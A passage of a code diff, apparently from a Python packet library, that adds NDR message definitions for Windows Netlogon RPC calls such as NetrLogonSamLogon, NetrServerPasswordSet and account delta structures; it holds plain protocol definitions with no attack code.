RPC_SID_IDENTIFIER_AUTHORITY(), + RPC_SID_IDENTIFIER_AUTHORITY, + ), + NDRConfFieldListField( + "SubAuthority", + [], + NDRIntField("", 0), + size_is=lambda pkt: pkt.SubAuthorityCount, + conformant_in_struct=True, + ), + ] + + +class PNETLOGON_VALIDATION_SAM_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("LogonTime", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("LogoffTime", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("KickOffTime", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("PasswordLastSet", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("PasswordCanChange", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("PasswordMustChange", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("EffectiveName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("FullName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("LogonScript", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("ProfilePath", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("HomeDirectory", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("HomeDirectoryDrive", UNICODE_STRING(), UNICODE_STRING), + NDRShortField("LogonCount", 0), + NDRShortField("BadPasswordCount", 0), + NDRIntField("UserId", 0), + NDRIntField("PrimaryGroupId", 0), + NDRIntField("GroupCount", None, size_of="GroupIds"), + NDRFullEmbPointerField( + NDRConfPacketListField( + "GroupIds", [], PGROUP_MEMBERSHIP, size_is=lambda pkt: pkt.GroupCount + ) + ), + NDRIntField("UserFlags", 0), + NDRPacketField("UserSessionKey", USER_SESSION_KEY(), USER_SESSION_KEY), + NDRPacketField("LogonServer", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("LogonDomainName", UNICODE_STRING(), UNICODE_STRING), + NDRFullEmbPointerField(NDRPacketField("LogonDomainId", PRPC_SID(), PRPC_SID)), + NDRFieldListField( + "ExpansionRoom", [0] * 10, NDRIntField("", 0), length_is=lambda _: 10 + ), + ] + + +class PNETLOGON_SID_AND_ATTRIBUTES(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField(NDRPacketField("Sid", PRPC_SID(), PRPC_SID)), + NDRIntField("Attributes", 0), + ] + + +class PNETLOGON_VALIDATION_SAM_INFO2(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("LogonTime", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("LogoffTime", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("KickOffTime", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("PasswordLastSet", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("PasswordCanChange", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("PasswordMustChange", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("EffectiveName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("FullName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("LogonScript", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("ProfilePath", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("HomeDirectory", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("HomeDirectoryDrive", UNICODE_STRING(), UNICODE_STRING), + NDRShortField("LogonCount", 0), + NDRShortField("BadPasswordCount", 0), + NDRIntField("UserId", 0), + NDRIntField("PrimaryGroupId", 0), + NDRIntField("GroupCount", None, size_of="GroupIds"), + NDRFullEmbPointerField( + NDRConfPacketListField( + "GroupIds", [], PGROUP_MEMBERSHIP, size_is=lambda pkt: pkt.GroupCount + ) + ), + NDRIntField("UserFlags", 0), + NDRPacketField("UserSessionKey", USER_SESSION_KEY(), USER_SESSION_KEY), + NDRPacketField("LogonServer", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("LogonDomainName", UNICODE_STRING(), UNICODE_STRING), + NDRFullEmbPointerField(NDRPacketField("LogonDomainId", PRPC_SID(), PRPC_SID)), + NDRFieldListField( + "ExpansionRoom", [0] * 10, NDRIntField("", 0), length_is=lambda _: 10 + ), + NDRIntField("SidCount", None, size_of="ExtraSids"), + NDRFullEmbPointerField( + NDRConfPacketListField( + "ExtraSids", + [], + PNETLOGON_SID_AND_ATTRIBUTES, + size_is=lambda pkt: pkt.SidCount, + ) + ), + ] + + +class PNETLOGON_VALIDATION_GENERIC_INFO2(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("DataLength", None, size_of="ValidationData"), + NDRFullEmbPointerField( + NDRConfStrLenField("ValidationData", "", size_is=lambda pkt: pkt.DataLength) + ), + ] + + +class PNETLOGON_VALIDATION_SAM_INFO4(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("LogonTime", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("LogoffTime", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("KickOffTime", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("PasswordLastSet", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("PasswordCanChange", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("PasswordMustChange", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("EffectiveName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("FullName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("LogonScript", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("ProfilePath", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("HomeDirectory", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("HomeDirectoryDrive", UNICODE_STRING(), UNICODE_STRING), + NDRShortField("LogonCount", 0), + NDRShortField("BadPasswordCount", 0), + NDRIntField("UserId", 0), + NDRIntField("PrimaryGroupId", 0), + NDRIntField("GroupCount", None, size_of="GroupIds"), + NDRFullEmbPointerField( + NDRConfPacketListField( + "GroupIds", [], PGROUP_MEMBERSHIP, size_is=lambda pkt: pkt.GroupCount + ) + ), + NDRIntField("UserFlags", 0), + NDRPacketField("UserSessionKey", USER_SESSION_KEY(), USER_SESSION_KEY), + NDRPacketField("LogonServer", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("LogonDomainName", UNICODE_STRING(), UNICODE_STRING), + NDRFullEmbPointerField(NDRPacketField("LogonDomainId", PRPC_SID(), PRPC_SID)), + StrFixedLenField("LMKey", "", length=8), + NDRIntField("UserAccountControl", 0), + NDRIntField("SubAuthStatus", 0), + NDRPacketField("LastSuccessfulILogon", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("LastFailedILogon", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRIntField("FailedILogonCount", 0), + NDRFieldListField( + "Reserved4", [0] * 1, NDRIntField("", 0), length_is=lambda _: 1 + ), + NDRIntField("SidCount", None, size_of="ExtraSids"), + NDRFullEmbPointerField( + NDRConfPacketListField( + "ExtraSids", + [], + PNETLOGON_SID_AND_ATTRIBUTES, + size_is=lambda pkt: pkt.SidCount, + ) + ), + NDRPacketField("DnsLogonDomainName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("Upn", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("ExpansionString1", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("ExpansionString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("ExpansionString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("ExpansionString4", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("ExpansionString5", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("ExpansionString6", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("ExpansionString7", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("ExpansionString8", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("ExpansionString9", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("ExpansionString10", UNICODE_STRING(), UNICODE_STRING), + ] + + +class PNETLOGON_VALIDATION_TICKET_LOGON(NDRPacket): + ALIGNMENT = (8, 8) + fields_desc = [ + NDRLongField("Results", 0), + NDRSignedIntField("KerberosStatus", 0), + NDRSignedIntField("NetlogonStatus", 0), + NDRPacketField("SourceOfStatus", UNICODE_STRING(), UNICODE_STRING), + NDRFullEmbPointerField( + NDRPacketField( + "UserInformation", + PNETLOGON_VALIDATION_SAM_INFO4(), + PNETLOGON_VALIDATION_SAM_INFO4, + ) + ), + NDRFullEmbPointerField( + NDRPacketField( + "DeviceInformation", + PNETLOGON_VALIDATION_SAM_INFO4(), + PNETLOGON_VALIDATION_SAM_INFO4, + ) + ), + NDRIntField("UserClaimsLength", None, size_of="UserClaims"), + NDRFullEmbPointerField( + NDRConfStrLenField( + "UserClaims", "", size_is=lambda pkt: pkt.UserClaimsLength + ) + ), + NDRIntField("DeviceClaimsLength", None, size_of="DeviceClaims"), + NDRFullEmbPointerField( + NDRConfStrLenField( + "DeviceClaims", "", size_is=lambda pkt: pkt.DeviceClaimsLength + ) + ), + ] + + +class NetrLogonSamLogon_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("LogonServer", "")), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ComputerName", "")), + NDRFullPointerField( + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ) + ), + NDRFullPointerField( + NDRPacketField( + "ReturnAuthenticator", + PNETLOGON_AUTHENTICATOR(), + PNETLOGON_AUTHENTICATOR, + ) + ), + NDRInt3264EnumField("LogonLevel", 0, NETLOGON_LOGON_INFO_CLASS), + NDRUnionField( + [ + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_INTERACTIVE_INFO(), + PNETLOGON_INTERACTIVE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_INTERACTIVE_INFO(), + PNETLOGON_INTERACTIVE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveTransitiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveTransitiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_SERVICE_INFO(), + PNETLOGON_SERVICE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_SERVICE_INFO(), + PNETLOGON_SERVICE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceTransitiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceTransitiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_NETWORK_INFO(), + PNETLOGON_NETWORK_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_NETWORK_INFO(), + PNETLOGON_NETWORK_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_GENERIC_INFO(), + PNETLOGON_GENERIC_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonGenericInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonGenericInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_TICKET_LOGON_INFO(), + PNETLOGON_TICKET_LOGON_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonTicketLogonInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonTicketLogonInformation + ), + ), + ), + ], + StrFixedLenField("LogonInformation", "", length=0), + align=(2, 8), + switch_fmt=("H", "I"), + ), + NDRInt3264EnumField("ValidationLevel", 0, NETLOGON_VALIDATION_INFO_CLASS), + ] + + +class NetrLogonSamLogon_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField( + NDRPacketField( + "ReturnAuthenticator", + PNETLOGON_AUTHENTICATOR(), + PNETLOGON_AUTHENTICATOR, + ) + ), + NDRUnionField( + [ + ( + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_SAM_INFO(), + PNETLOGON_VALIDATION_SAM_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "ValidationLevel", None) + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo + ), + ( + lambda _, val: val.tag + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_SAM_INFO2(), + PNETLOGON_VALIDATION_SAM_INFO2, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "ValidationLevel", None) + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo2 + ), + ( + lambda _, val: val.tag + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo2 + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_GENERIC_INFO2(), + PNETLOGON_VALIDATION_GENERIC_INFO2, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "ValidationLevel", None) + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationGenericInfo2 + ), + ( + lambda _, val: val.tag + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationGenericInfo2 + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_SAM_INFO4(), + PNETLOGON_VALIDATION_SAM_INFO4, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "ValidationLevel", None) + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4 + ), + ( + lambda _, val: val.tag + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4 + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_TICKET_LOGON(), + PNETLOGON_VALIDATION_TICKET_LOGON, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "ValidationLevel", None) + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationTicketLogon + ), + ( + lambda _, val: val.tag + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationTicketLogon + ), + ), + ), + ], + StrFixedLenField("ValidationInformation", "", length=0), + align=(2, 8), + switch_fmt=("H", "I"), + ), + NDRByteField("Authoritative", 0), + NDRIntField("status", 0), + ] + + +class NetrLogonSamLogoff_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("LogonServer", "")), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ComputerName", "")), + NDRFullPointerField( + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ) + ), + NDRFullPointerField( + NDRPacketField( + "ReturnAuthenticator", + PNETLOGON_AUTHENTICATOR(), + PNETLOGON_AUTHENTICATOR, + ) + ), + NDRInt3264EnumField("LogonLevel", 0, NETLOGON_LOGON_INFO_CLASS), + NDRUnionField( + [ + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_INTERACTIVE_INFO(), + PNETLOGON_INTERACTIVE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_INTERACTIVE_INFO(), + PNETLOGON_INTERACTIVE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveTransitiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveTransitiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_SERVICE_INFO(), + PNETLOGON_SERVICE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_SERVICE_INFO(), + PNETLOGON_SERVICE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceTransitiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceTransitiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_NETWORK_INFO(), + PNETLOGON_NETWORK_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_NETWORK_INFO(), + PNETLOGON_NETWORK_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_GENERIC_INFO(), + PNETLOGON_GENERIC_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonGenericInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonGenericInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_TICKET_LOGON_INFO(), + PNETLOGON_TICKET_LOGON_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonTicketLogonInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonTicketLogonInformation + ), + ), + ), + ], + StrFixedLenField("LogonInformation", "", length=0), + align=(2, 8), + switch_fmt=("H", "I"), + ), + ] + + +class NetrLogonSamLogoff_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField( + NDRPacketField( + "ReturnAuthenticator", + PNETLOGON_AUTHENTICATOR(), + PNETLOGON_AUTHENTICATOR, + ) + ), + NDRIntField("status", 0), + ] + + +class PNETLOGON_CREDENTIAL(NDRPacket): + fields_desc = [StrFixedLenField("data", "", length=8)] + + class NetrServerReqChallenge_Request(NDRPacket): fields_desc = [ NDRFullPointerField(NDRConfVarStrNullFieldUtf16("PrimaryName", "")), @@ -66,7 +1037,7 @@ class NETLOGON_SECURE_CHANNEL_TYPE(IntEnum): CdcServerSecureChannel = 7 -class NetrServerAuthenticate3_Request(NDRPacket): +class NetrServerAuthenticate_Request(NDRPacket): fields_desc = [ NDRFullPointerField(NDRConfVarStrNullFieldUtf16("PrimaryName", "")), NDRConfVarStrNullFieldUtf16("AccountName", ""), @@ -75,15 +1046,3255 @@ class NetrServerAuthenticate3_Request(NDRPacket): NDRPacketField( "ClientCredential", PNETLOGON_CREDENTIAL(), PNETLOGON_CREDENTIAL ), - NDRIntField("NegotiateFlags", 0), ] -class NetrServerAuthenticate3_Response(NDRPacket): +class NetrServerAuthenticate_Response(NDRPacket): fields_desc = [ NDRPacketField( "ServerCredential", PNETLOGON_CREDENTIAL(), PNETLOGON_CREDENTIAL ), + NDRIntField("status", 0), + ] + + +class PENCRYPTED_NT_OWF_PASSWORD(NDRPacket): + fields_desc = [ + PacketListField( + "data", [CYPHER_BLOCK()] * 2, CYPHER_BLOCK, count_from=lambda _: 2 + ) + ] + + +class NetrServerPasswordSet_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("PrimaryName", "")), + NDRConfVarStrNullFieldUtf16("AccountName", ""), + NDRInt3264EnumField("SecureChannelType", 0, NETLOGON_SECURE_CHANNEL_TYPE), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField( + "UasNewPassword", PENCRYPTED_NT_OWF_PASSWORD(), PENCRYPTED_NT_OWF_PASSWORD + ), + ] + + +class NetrServerPasswordSet_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRIntField("status", 0), + ] + + +class PNLPR_MODIFIED_COUNT(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [ + NDRPacketField("ModifiedCount", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER) + ] + + +class NETLOGON_DELTA_TYPE(IntEnum): + AddOrChangeDomain = 1 + AddOrChangeGroup = 2 + DeleteGroup = 3 + RenameGroup = 4 + AddOrChangeUser = 5 + DeleteUser = 6 + RenameUser = 7 + ChangeGroupMembership = 8 + AddOrChangeAlias = 9 + DeleteAlias = 10 + RenameAlias = 11 + ChangeAliasMembership = 12 + AddOrChangeLsaPolicy = 13 + AddOrChangeLsaTDomain = 14 + DeleteLsaTDomain = 15 + AddOrChangeLsaAccount = 16 + DeleteLsaAccount = 17 + AddOrChangeLsaSecret = 18 + DeleteLsaSecret = 19 + DeleteGroupByName = 20 + DeleteUserByName = 21 + SerialNumberSkip = 22 + + +class PNETLOGON_DELTA_DOMAIN(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("DomainName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("OemInformation", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("ForceLogoff", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRShortField("MinPasswordLength", 0), + NDRShortField("PasswordHistoryLength", 0), + NDRPacketField("MaxPasswordAge", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("MinPasswordAge", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("DomainModifiedCount", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("DomainCreationTime", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRIntField("SecurityInformation", 0), + NDRIntField("SecuritySize", None, size_of="SecurityDescriptor"), + NDRFullEmbPointerField( + NDRConfStrLenField( + "SecurityDescriptor", "", size_is=lambda pkt: pkt.SecuritySize + ) + ), + NDRPacketField("DomainLockoutInformation", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("PasswordProperties", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class PNETLOGON_DELTA_GROUP(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("Name", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("RelativeId", 0), + NDRIntField("Attributes", 0), + NDRPacketField("AdminComment", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("SecurityInformation", 0), + NDRIntField("SecuritySize", None, size_of="SecurityDescriptor"), + NDRFullEmbPointerField( + NDRConfStrLenField( + "SecurityDescriptor", "", size_is=lambda pkt: pkt.SecuritySize + ) + ), + NDRPacketField("DummyString1", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("DummyLong1", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class PNETLOGON_DELTA_RENAME_GROUP(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("OldName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("NewName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString1", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("DummyLong1", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class NLPR_LOGON_HOURS(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRShortField( + "UnitsPerWeek", + None, + size_of="LogonHours", + adjust=lambda _, x: ((x * 8) - 7), + ), + NDRFullEmbPointerField( + NDRConfVarStrLenField( + "LogonHours", + "", + size_is=lambda pkt: 1260, + length_is=lambda pkt: ((pkt.UnitsPerWeek + 7) // 8), + ) + ), + ] + + +class ENCRYPTED_NT_OWF_PASSWORD(NDRPacket): + fields_desc = [ + PacketListField( + "data", [CYPHER_BLOCK()] * 2, CYPHER_BLOCK, count_from=lambda _: 2 + ) + ] + + +class ENCRYPTED_LM_OWF_PASSWORD(NDRPacket): + fields_desc = [ + PacketListField( + "data", [CYPHER_BLOCK()] * 2, CYPHER_BLOCK, count_from=lambda _: 2 + ) + ] + + +class NLPR_USER_PRIVATE_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRByteField("SensitiveData", 0), + NDRIntField("DataLength", None, size_of="Data"), + NDRFullEmbPointerField( + NDRConfStrLenField("Data", "", size_is=lambda pkt: pkt.DataLength) + ), + ] + + +class PNETLOGON_DELTA_USER(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("UserName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("FullName", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("UserId", 0), + NDRIntField("PrimaryGroupId", 0), + NDRPacketField("HomeDirectory", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("HomeDirectoryDrive", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("ScriptPath", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("AdminComment", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("WorkStations", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("LastLogon", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("LastLogoff", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("LogonHours", NLPR_LOGON_HOURS(), NLPR_LOGON_HOURS), + NDRShortField("BadPasswordCount", 0), + NDRShortField("LogonCount", 0), + NDRPacketField("PasswordLastSet", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("AccountExpires", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRIntField("UserAccountControl", 0), + NDRPacketField( + "EncryptedNtOwfPassword", + ENCRYPTED_NT_OWF_PASSWORD(), + ENCRYPTED_NT_OWF_PASSWORD, + ), + NDRPacketField( + "EncryptedLmOwfPassword", + ENCRYPTED_LM_OWF_PASSWORD(), + ENCRYPTED_LM_OWF_PASSWORD, + ), + NDRByteField("NtPasswordPresent", 0), + NDRByteField("LmPasswordPresent", 0), + 